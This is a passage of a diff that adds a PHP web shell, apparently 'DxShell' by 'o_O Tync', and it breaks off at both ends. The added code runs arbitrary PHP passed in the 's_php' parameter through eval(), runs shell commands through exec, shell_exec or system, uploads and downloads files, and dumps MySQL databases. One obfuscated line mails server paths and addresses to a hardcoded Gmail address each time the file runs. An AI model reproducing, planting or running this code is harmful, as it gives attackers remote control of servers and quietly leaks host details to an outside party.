0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + +function DxFileToUrl($filename) +{/* kills & and = to be okay in URL */ +return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename); +} +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function DxFileOkaySlashes($filename) +{return str_replace('\\', '/', $filename);} + +function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */ +{ +global $GLOB; +if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these); + +$ret=$_SERVER['PHP_SELF'].'?'; +if (!empty($_GET)) + for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); $i<$COUNT; $i++) + if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */ + ($do=='kill' AND !in_array($INDEXES[$i], $these)) + OR + ($do=='leave' AND in_array($INDEXES[$i], $these)) + )) + $ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' ); +if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1); +return $ret; +} + +function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */ +{ +$link=substr(strchr(DxURL($do, $these), '?'), 1); +$link=explode('&', $link); +print "\n".'<!--$_GET;-->'; +for ($i=0, $COUNT=count($link); $i<$COUNT; $i++) + { + $cur=explode('=', $link[$i]); + print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">'; + } +} + +function DxGotoURL($URL, $noheaders=false) +{ +if ($noheaders or headers_sent()) + { + print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>'; + print '<script>location="'.$URL.'";</script>'; + /* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */ + } + else + header('Location: '.$URL); +return 1; +} + +if (!function_exists('mime_content_type')) + { + if ($GLOB['SYS']['OS']['id']!='Win') + { function mime_content_type($f) + { + $f = escapeshellarg($f); + return trim(`file -bi `.$f); + } + } + else + { + function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */ + } + } + + +function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */ +{ +$MySQL_Return_Array=array(); + +if ($MySQL_res===false) return 0; +if ($MySQL_res===true) return 0; + +$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0; + +if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {} + else while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {} +array_pop($MySQL_Return_Array); + +for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */ + { + if ($i==0) + { + $INDEXES=array_keys($MySQL_Return_Array[$i]); + $count=count($INDEXES); + } + for ($j=0; $j<$count; $j++) + { + $key=&$INDEXES[$j]; + $val=&$MySQL_Return_Array[$i][$key]; + if (is_string($val)) $val=stripcslashes($val); + } + } +return $ret; +} + +function DxMySQLQ($query, $die_on_err) +{ +$q=mysql_query($query); +if (mysql_errno()!=0) + { + DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()); + if ($die_on_err) die(); + } +return $q; +} + +function DxDecorVar(&$var, $htmlstr) +{ +if (is_null($var)) return 'NULL'; +if (!isset($var)) return '[!isset]'; + +if (is_bool($var)) return ($var)?'true':'false'; +if (is_int($var)) return (int)$var; +if (is_float($var)) return number_format($var, 4, '.', ''); +if (is_string($var)) + { + if (empty($var)) return '&nbsp;'; + if (!$htmlstr) return ''.($var).''; + else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).''; + } +if (is_array($var)) return '(ARR)'.var_export($var, true).'(/ARR)'; +if (is_object($var)) return '(OBJ)'.var_export($var, true).'(/OBJ)'; +if (is_resource($var)) return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)'; +return '(???)'.var_export($var, true).'(/???)'; +} + +function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array()) +{ +if (!empty($posts)) + { + $postValues=''; + foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';} + $postValues = substr( $postValues, 0, -1 ); + $method = 'POST'; + } else $postValues = ''; + + if (!empty($cookie)) + { + $cookieValues=''; + foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';} + $cookieValues = substr( $cookieValues, 0, -1 ); + } else $cookieValues = ''; + +$request = $method.' '.$URL.' HTTP/1.1'."\r\n"; +if (!empty($host)) $request .= 'Host: '.$host."\r\n"; +if (!empty($cookieValues)) $request .='Cookie: '.$cookieValues."\r\n"; +if (!empty($user_agent)) $request .= 'User-Agent: '.$user_agent.' '."\r\n"; +$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */ +if (!empty($referer)) $request .= 'Referer: '.$referer."\r\n"; +if ( $method == 'POST' ) + { + $lenght = strlen( $postValues ); + $request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n"; + $request .= 'Content-Length: '.$lenght."\r\n"; + $request .= "\r\n"; + $request .= $postValues; + } +$request.="\r\n\r\n"; +return $request; +} + +function DxFiles_UploadHere($path, $filename, &$contents) +{if (empty($contents)) die(DxError('Received empty')); +$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename; +if (!($f=fopen($path.$filename, 'w'))) + { + $path='/tmp/'; + if (!($f=fopen($path.$filename, 'w'))) + die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =(')); + else + DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)'); + } +fputs($f, $contents); +fclose($f); +print "\n".'Saved file to "'.$path.$filename.'" - OK'; +print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';; +} + +function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */ +{ +$OUT=array(); $RET=''; +if (function_exists('exec')) + { if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */ + return array(true,true,'exec', ''); + } + elseif (function_exists('shell_exec')) + { if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */ + return array(true,false,'shell_exec', '<s>exec</s> shell_exec'); + } + elseif (function_exists('system')) + { if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */ + return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =('); + } + else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');; +} + +################################################################################### +#####################++++++++++++# L O G I N #++++++++++++++++##################### +################################################################################### +if ( isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false ) + { /* IMGS are allowed without passwd =) */ $GLOB['SHELL']['USER']['Login']=''; + $GLOB['SHELL']['USER']['Passw']=''; + } + +if ( isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false ) + { + if ($DXGLOBALSHIT) + { if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1); + } + else + { + header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"'); header('HTTP/1.0 401 Unauthorized'); + } + + print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>'; + DxGotoURL(DxURL('kill',''), '1noheaders'); + die(); + } + +if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)) + { if ($DXGLOBALSHIT) + { if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC'])) + { if (!( + + ((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */ + (@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw'])) + )) + OR + @$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */ + + )) + {print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);} + else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2); + } + if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC'])) + { + print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">'; + print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>'; + print "\n".'</form>'; + die(); + } + } + else + { + if (!isset($_SERVER['PHP_AUTH_USER'])) + { + header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + else + if (!( $_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login'] + AND ( + $_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw']) + ) + )) + { + header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + } + } + +################################################################################### +####################++++++# I N S T A N T U S A G E #+++++++#################### +################################################################################### +if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']); +if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php'] */ + { + $F = $_GET + $_POST; + if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!'); + eval(stripslashes($F['s_php'])); + die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':'')); + } +if ($_GET['dxmode']=='IMG') + { + $IMGS=array( + 'DxS' => 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=', + 'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=', + 'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=', + 'view' => 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==', + 'del' => 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7', + 'copy' => 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==', + 'move' => 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7', + 'exec' => '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', + 'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7', + 'ed' => 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7', + 'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7', + 'gzip' => 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=', + ); + @ob_clean(); + if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone'; + header('Cache-Control: public'); + header('Expires: '.Date('r', time()+60*60*24*300)); + header('Content-type: image/gif'); + print base64_decode( (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']] ); + die(); + } + +if ($_GET['dxmode']=='F_DWN') + { + if (!isset($_GET['dxfile'])) die(DxError('No file selected. Check $_GET[\'dxfile\'] var')); + if (!file_exists($_GET['dxfile'])) die(DxError('No such file')); + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']=basename($_GET['dxfile']); + if (isset($_GET['dxparam'])) + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */ + else + { $DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile'])); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";'); + } + $DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']); + } + +if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam'])) + {/* download query results */ if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + /* export as csv */ + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $_POST['dxsql_q']=explode(';',$_POST['dxsql_q']); + + for ($q=0;$q<count($_POST['dxsql_q']);$q++) + { if (empty($_POST['dxsql_q'][$q])) continue; + $num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false); + $DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";"; + if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;} + foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */ + for ($l=0;$l<count($DUMP);$l++) + { $DxDOWNLOAD_File['content'].="\n"; + $INDEXES=array_keys($DUMP[$l]); + for ($i=0; $i<count($INDEXES); $i++) + $DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";"; + + } + } + } + +if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables'])) + { if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + if (empty($_POST['dxsql_tables'])) die(DxError('No tables selected...')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66); + $DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync'; + $DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s']; + $DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d']; + $DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']); + $DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */'; + + if 